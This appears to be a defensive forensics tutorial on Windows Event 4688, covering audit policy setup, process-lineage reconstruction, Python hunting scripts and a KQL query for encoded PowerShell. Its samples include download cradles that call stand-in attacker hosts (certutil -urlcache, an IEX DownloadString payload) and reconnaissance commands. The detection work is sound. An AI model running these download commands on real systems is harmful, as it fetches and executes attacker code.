
Artifact Analysis: Event ID 4688 & Process Lineage

1. The Visibility Prerequisite (GPO Configuration)


By default, Windows does not audit process creation at all (the Detailed Tracking > Process Creation subcategory is set to No Auditing), and even where it is enabled, Event 4688 omits the command line unless a second, separate policy is turned on. Microsoft ships it that way because command lines can contain passwords and other secrets and because the volume is significant. A 4688 record without command-line data is severely degraded for DFIR purposes: it tells you that powershell.exe ran, not what it ran.

To unlock the full potential of this artifact, administrators must deploy a Group Policy Object (GPO) across the domain:

  1. Enable Process Creation Auditing: Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Detailed Tracking. Set Audit Process Creation to Success.
  2. Enable Command Line Auditing (CRITICAL): Navigate to Computer Configuration > Policies > Administrative Templates > System > Audit Process Creation. Set Include command line in process creation events to Enabled. On Windows 8.1 / Server 2012 R2 and older this setting only exists once update KB3004375 is installed.

Verify the result on a target host rather than trusting the GPO report: auditpol /get /subcategory:"Process Creation" should show Success, and the second policy sets the registry value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit\ProcessCreationIncludeCmdLine_Enabled to 1.
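The check a responder would script before relying on 4688, as an added example (not code from the original page): it parses the CSV form of auditpol output and reads the registry value the command-line policy sets. The host name and the sample auditpol output are constructed so the parsing logic can be exercised off-box; the live path only runs on Windows.

```python
"""Verify the two settings section 1 requires before trusting Event 4688.

Added example, not code from the original page. It reads the effective
audit policy from `auditpol /get /subcategory:"Process Creation" /r` (CSV
output) and the registry value the "Include command line in process
creation events" policy sets:
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit,
ProcessCreationIncludeCmdLine_Enabled = 1. The sample auditpol output and
host name below are constructed so the logic runs off-box.
"""
import csv
import io
import subprocess
import sys

AUDIT_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
CMDLINE_VALUE = "ProcessCreationIncludeCmdLine_Enabled"

# Constructed sample of `auditpol /get /subcategory:"Process Creation" /r`.
SAMPLE_AUDITPOL_CSV = (
    "Machine Name,Policy Target,Subcategory,Subcategory GUID,"
    "Inclusion Setting,Exclusion Setting\r\n"
    "WKSTN01,System,Process Creation,"
    "{0CCE922B-69AE-11D9-BED3-505054503030},Success,\r\n"
)


def parse_auditpol_csv(text: str) -> str:
    """Return the Inclusion Setting for Process Creation: 'Success',
    'Success and Failure', 'Failure' or 'No Auditing'."""
    for row in csv.DictReader(io.StringIO(text)):
        if row.get("Subcategory", "").strip() == "Process Creation":
            return row["Inclusion Setting"].strip()
    raise ValueError("Process Creation subcategory missing from auditpol output")


def assess(inclusion_setting: str, cmdline_flag) -> dict:
    """Map the two settings to the states section 1 requires. Failure-only
    auditing never produces 4688, so 'Success' must be part of the setting."""
    process_creation_ok = "Success" in inclusion_setting
    cmdline_ok = cmdline_flag == 1
    return {
        "process_creation_audited": process_creation_ok,
        "command_line_included": cmdline_ok,
        # A 4688 without the command line is degraded evidence; require both.
        "usable_for_dfir": process_creation_ok and cmdline_ok,
    }


def read_live_settings() -> dict:
    """Query the running host (Windows only; auditpol needs an elevated shell)."""
    import winreg
    out = subprocess.run(
        ["auditpol", "/get", "/subcategory:Process Creation", "/r"],
        capture_output=True, text=True, check=True).stdout
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, AUDIT_KEY) as key:
            flag, _ = winreg.QueryValueEx(key, CMDLINE_VALUE)
    except FileNotFoundError:
        flag = 0  # key or value absent: the policy was never applied
    return assess(parse_auditpol_csv(out), flag)


if __name__ == "__main__":
    if sys.platform == "win32":
        print(read_live_settings())
    else:
        print(assess(parse_auditpol_csv(SAMPLE_AUDITPOL_CSV), 1))
```

Run it from an elevated prompt on the host being checked; a `usable_for_dfir` of False means the 4688 records on that machine will be missing either entirely or their most valuable field.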

Once properly configured, parsing an Event 4688 record yields three highly structured categories of forensic data: the subject that started the process (who), the new process itself (what), and the creator process (where from).

  • Security ID / Account Name: The account whose token was used to create the process. If a standard user account spawns an administrative tool, it warrants immediate scrutiny. On Windows 10 / Server 2016 and later the record also carries a Target Subject block, populated when the new process runs under a different account than its creator (for example via runas).
  • New Process Name: The absolute path of the executed binary (e.g., C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe).
  • New Process ID (PID): The identifier of the spawned process, rendered in hexadecimal (e.g., 0x1a4c). Convert it to decimal before correlating with Sysmon, EDR telemetry or tasklist output, which all show PIDs in decimal.
  • Process Command Line: The most valuable field. It reveals exactly how the binary was executed, exposing arguments, flags, and embedded scripts (e.g., powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JAB...).

C. Creator Process Information (Where From)

  • Creator Process Name: The path of the parent executable. This field exists on Windows 10 / Server 2016 and later; older versions record only the Creator Process ID, and the parent's name has to be recovered by matching that ID against an earlier 4688.
  • Creator Process ID: The parent PID (also hexadecimal). Matching it against the New Process ID of an earlier 4688 on the same host is how the Process Lineage (the process tree) is reconstructed. It is a plain numeric reference, not a cryptographic link: PIDs are recycled once a process exits, so always match against the most recent 4688 that created that PID before the child's creation time, or the tree will attach the child to the wrong parent.

3. DFIR Triage: Hunting by Process Lineage


Process Lineage analysis relies on understanding standard Windows behavior. Malicious activity often breaks these logical rules. Analysts stack Event 4688 logs to find anomalous Parent-Child relationships.

Phishing & Macro Abuse

Suspicious Lineage: outlook.exe or winword.exe → cmd.exe or powershell.exe. Word processors and mail clients have almost no legitimate reason to spawn a command interpreter; the pair is a classic signature of a malicious macro executing a dropper payload. Treat wscript.exe, mshta.exe and rundll32.exe as children the same way, and baseline the few business macros that legitimately shell out before turning this into an alert.

Web Shell Execution

Suspicious Lineage: w3wp.exe (IIS), httpd.exe, or tomcat.exe → cmd.exe or whoami.exe. A web server worker process has no reason to spawn an interactive shell or a reconnaissance binary; if it does, the server has been compromised via an RCE exploit or a web shell. In these records the subject is the application pool or service identity (e.g., IIS APPPOOL\DefaultAppPool) rather than an interactive user, which is itself a useful pivot.
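The lineage reconstruction from the field descriptions above and the parent/child checks from this section, as one added example (not code from the original page). The records are constructed 4688 XML in the Security log's schema; the host, user, paths and command lines are hypothetical. The sample deliberately reuses a PID so the most-recent-creator rule can be seen to matter.

```python
"""Reconstruct process lineage from Event 4688 records and flag the
parent/child pairs described above (Office -> shell, web server -> shell).

Added example, not code from the original page. Records are constructed
4688 XML in the Security log schema: EventData fields NewProcessId and
NewProcessName are the child, ProcessId and ParentProcessName the creator.
Host, user, paths and command lines are hypothetical. PIDs are hex strings
in 4688 and are converted to int so they compare with other tools' output.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
from typing import Dict, List, Tuple
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "mshta.exe"}
RECON = {"whoami.exe", "net.exe", "systeminfo.exe", "nltest.exe"}
# Parent image -> child images it should not be spawning (lower-case names).
SUSPICIOUS_PAIRS = {
    "winword.exe": SHELLS, "excel.exe": SHELLS, "outlook.exe": SHELLS,
    "w3wp.exe": SHELLS | RECON, "httpd.exe": SHELLS | RECON, "tomcat.exe": SHELLS | RECON,
}


def make_4688(t: str, host: str, pid: int, image: str, ppid: int, parent: str, cmd: str) -> str:
    """Constructed 4688 record in the Security log's XML schema (hypothetical data)."""
    return (
        f'<Event xmlns="{NS["e"]}"><System><EventID>4688</EventID>'
        f'<TimeCreated SystemTime="{t}"/><Computer>{host}</Computer></System><EventData>'
        '<Data Name="SubjectUserName">alice</Data><Data Name="SubjectDomainName">CORP</Data>'
        f'<Data Name="NewProcessId">{pid:#x}</Data><Data Name="NewProcessName">{image}</Data>'
        f'<Data Name="ProcessId">{ppid:#x}</Data><Data Name="CommandLine">{escape(cmd)}</Data>'
        f'<Data Name="ParentProcessName">{parent}</Data></EventData></Event>'
    )


HOST = "WKSTN01.corp.example"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER, CMD, NOTEPAD = r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\notepad.exe"
SAMPLE_RECORDS = [
    make_4688("2024-05-01T10:00:00.0000000Z", HOST, 0x1000, EXPLORER, 0x0FC0, r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    make_4688("2024-05-01T10:05:00.1234567Z", HOST, 0x1A4C, WORD, 0x1000, EXPLORER, f'"{WORD}" /n "C:\\Users\\alice\\Downloads\\invoice.docm"'),
    make_4688("2024-05-01T10:05:30.0000000Z", HOST, 0x2B10, PS, 0x1A4C, WORD, "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    make_4688("2024-05-01T10:06:00.0000000Z", HOST, 0x2C00, CMD, 0x1000, EXPLORER, "cmd.exe"),
    # PID 0x1a4c is recycled by notepad.exe after WINWORD.EXE has exited ...
    make_4688("2024-05-01T10:20:00.0000000Z", HOST, 0x1A4C, NOTEPAD, 0x1000, EXPLORER, "notepad.exe"),
    # ... so this cmd.exe's creator is notepad.exe, not WINWORD.EXE.
    make_4688("2024-05-01T10:21:00.0000000Z", HOST, 0x3000, CMD, 0x1A4C, NOTEPAD, "cmd.exe /c whoami"),
]


def parse_time(s: str) -> datetime:
    # SystemTime carries up to 7 fractional digits; strptime takes at most 6.
    main, _, frac = s.rstrip("Z").partition(".")
    dt = datetime.strptime(main, "%Y-%m-%dT%H:%M:%S")
    return dt.replace(microsecond=int((frac + "000000")[:6]), tzinfo=timezone.utc)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_4688(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4688":
        raise ValueError("not a 4688 record")
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {
        "time": parse_time(root.find("e:System/e:TimeCreated", NS).get("SystemTime")),
        "host": root.findtext("e:System/e:Computer", namespaces=NS),
        "user": data.get("SubjectDomainName", "") + "\\" + data.get("SubjectUserName", ""),
        "pid": int(data["NewProcessId"], 16),               # "0x1a4c" -> 6732
        "image": data["NewProcessName"],
        "ppid": int(data["ProcessId"], 16),                 # creator PID, also hex
        "parent_image": data.get("ParentProcessName", ""),  # absent before Win10/2016
        "cmdline": data.get("CommandLine", ""),
        "parent_event": None,
    }


def build_lineage(events: List[dict]) -> List[dict]:
    """Link each event to the 4688 that created its parent. The creator PID is
    matched to the most recent EARLIER event on the same host that created that
    PID, because PIDs are recycled once a process exits."""
    events = sorted(events, key=lambda e: e["time"])
    latest: Dict[Tuple[str, int], dict] = {}
    for ev in events:
        ev["parent_event"] = latest.get((ev["host"], ev["ppid"]))
        latest[(ev["host"], ev["pid"])] = ev
    return events


def chain(ev: dict) -> List[str]:
    """Image names from the oldest known ancestor down to ev."""
    names = [image_name(ev["image"])]
    while ev["parent_event"] is not None:
        ev = ev["parent_event"]
        names.append(image_name(ev["image"]))
    if ev["parent_image"]:  # tree truncated: fall back to the name the record carries
        names.append(image_name(ev["parent_image"]))
    return names[::-1]


def find_suspicious(events: List[dict]) -> List[Tuple[str, str, str]]:
    hits = []
    for ev in events:
        parent = ev["parent_event"]
        parent_name = image_name(parent["image"] if parent else ev["parent_image"])
        if image_name(ev["image"]) in SUSPICIOUS_PAIRS.get(parent_name, ()):
            hits.append((ev["host"], " -> ".join(chain(ev)), ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for host, lineage, cmd in find_suspicious(build_lineage([parse_4688(r) for r in SAMPLE_RECORDS])):
        print(f"{host}: {lineage}\n    {cmd}")
```

Only the WINWORD.EXE → powershell.exe pair is reported; the later cmd.exe whose creator PID is 0x1a4c is correctly attached to notepad.exe, because the linker keys on the most recent event that created that PID rather than the first. Feed it the output of an evtx export (one XML document per record) instead of SAMPLE_RECORDS for real triage.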

Threat actors heavily utilize Living Off The Land Binaries and Scripts (LOLBAS)—native Windows tools like certutil.exe, bitsadmin.exe, or rundll32.exe—to download payloads or execute code without dropping custom malware.

Event 4688 exposes these techniques via the Command Line field. Analysts must hunt for:

  • Reconnaissance Cascades: Rapid sequential execution of whoami, net group "Domain Admins" /domain, systeminfo, and nltest.
  • Base64 Obfuscation: Attackers pass PowerShell payloads via -EncodedCommand to evade simple string matching. powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc, -encoded, ...), so hunt for the prefix followed by a long block of Base64 characters rather than for one spelling. The blob is Base64 of UTF-16LE text: decode it as such, or a plain Base64 decode will come out as NUL-interleaved characters.
  • Remote Downloads: certutil.exe -urlcache -split -f http://malicious.com/payload.exe
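Detection logic for the three hunts above, run over a handful of already-parsed 4688 rows, as an added example (not code from the original page). The hosts, users, paths, URL, time window and thresholds are assumptions; the rows are constructed, and the encoded payload is built in the block so the decode can be checked against it.

```python
"""Hunt the 4688 CommandLine field for the patterns listed above: encoded
PowerShell, LOLBAS download cradles and reconnaissance cascades.

Added example, not code from the original page. Input rows are parsed 4688
fields (time, host, user, image, cmdline); the sample rows are constructed.
An -EncodedCommand payload is Base64 of UTF-16LE text, so it is decoded as
UTF-16LE rather than ASCII.
"""
import base64
import re
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, -encoded ...), so match the prefix plus a Base64-looking blob.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)
DOWNLOAD_RE = [
    re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I),
    re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b", re.I),
]
RECON_IMAGES = {"whoami.exe", "net.exe", "systeminfo.exe", "nltest.exe",
                "ipconfig.exe", "tasklist.exe", "quser.exe"}

# Constructed sample: one user runs the whole playbook, another runs a single
# benign-looking command plus a script with -ExecutionPolicy (not -e).
PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example/a.ps1")'
ENC_BLOB = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
T0 = datetime(2024, 5, 1, 10, 0, 0)


def row(secs: int, image: str, cmdline: str, user: str = "CORP\\alice") -> dict:
    return {"time": T0 + timedelta(seconds=secs), "host": "WKSTN01",
            "user": user, "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [
    row(0, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", f"powershell.exe -nop -w hidden -enc {ENC_BLOB}"),
    row(5, r"C:\Windows\System32\certutil.exe", "certutil.exe -urlcache -split -f http://malicious.example/payload.exe C:\\Users\\Public\\p.exe"),
    row(10, r"C:\Windows\System32\whoami.exe", "whoami"),
    row(12, r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    row(15, r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    row(20, r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp"),
    row(3600, r"C:\Windows\System32\whoami.exe", "whoami", user="CORP\\bob"),
    row(3605, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1", user="CORP\\bob"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def is_download_cradle(cmdline: str) -> bool:
    return any(r.search(cmdline) for r in DOWNLOAD_RE)


def find_recon_cascades(events: List[dict], window: timedelta = timedelta(minutes=2),
                        threshold: int = 3) -> List[Tuple[Tuple[str, str], List[str]]]:
    """Per (host, user): flag >= threshold DISTINCT recon binaries run within
    `window` of one another. Distinct names keep a single looping `whoami`
    from tripping the rule."""
    by_actor = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name in RECON_IMAGES:
            by_actor.setdefault((ev["host"], ev["user"]), []).append((ev["time"], name))
    hits = []
    for actor, runs in by_actor.items():
        for i, (start, _) in enumerate(runs):
            seen = {n for t, n in runs[i:] if t - start <= window}
            if len(seen) >= threshold:
                hits.append((actor, sorted(seen)))
                break
    return hits


def triage(events: List[dict]) -> List[Tuple[str, str, str, str]]:
    findings = []
    for ev in events:
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            findings.append(("encoded_powershell", ev["host"], ev["user"], decoded))
        if is_download_cradle(ev["cmdline"]):
            findings.append(("download_cradle", ev["host"], ev["user"], ev["cmdline"]))
    for (host, user), names in find_recon_cascades(events):
        findings.append(("recon_cascade", host, user, ", ".join(names)))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

The prefix regex is the part worth copying into a SIEM rule: it catches -e, -ec and -enc alike while ignoring -ExecutionPolicy and -File, which a naive `contains "-e"` would not. Decoding in UTF-16LE turns the blob back into the IEX download cradle, which is the string the rest of your detections should run against.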

While native Event 4688 is excellent, Microsoft's Sysinternals Sysmon provides a richer alternative: Sysmon Event ID 1 (Process Creation), written to the Microsoft-Windows-Sysmon/Operational log rather than the Security log. Where both are available, hunt on Sysmon first, but keep collecting 4688: it needs no agent, and it is the only process-creation source on hosts where Sysmon was never deployed.

| Feature | Windows Event 4688 | Sysmon Event ID 1 |
| --- | --- | --- |
| Command line logging | Requires the separate GPO from section 1 | Always included |
| Binary hash | Not available | MD5, SHA1, SHA256, IMPHASH (selected in the Sysmon configuration) |
| Original file name | Not available | Yes (OriginalFileName from the PE version resource, defeats simple binary renaming) |
| Process GUID | Not available (hex PID only, recycled after exit) | Yes (ProcessGuid is unique across reboots and PID reuse, so parent/child correlation does not depend on ordering) |

Use these queries to proactively detect anomalous process lineage and obfuscation in your SIEM.

hunt_obfuscated_powershell.kql
// Detects PowerShell launched with an encoded command. powershell.exe accepts any
// unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), so match the prefix
// followed by a Base64-looking blob instead of a few literal spellings; a bare
// contains "-enc" also fires on -Encoding, and contains "-e " misses -ec.
// NewProcessName is the full path of the child; ParentProcessName is the creator.
SecurityEvent
| where EventID == 4688
| where NewProcessName endswith @"\powershell.exe" or NewProcessName endswith @"\pwsh.exe"
| where CommandLine matches regex @"(?i)(^|\s)-e(c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}"
| extend EncodedPayload = extract(@"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", 1, CommandLine)
| project TimeGenerated, Computer, Account, ParentProcessName, NewProcessName, CommandLine, EncodedPayload
| sort by TimeGenerated desc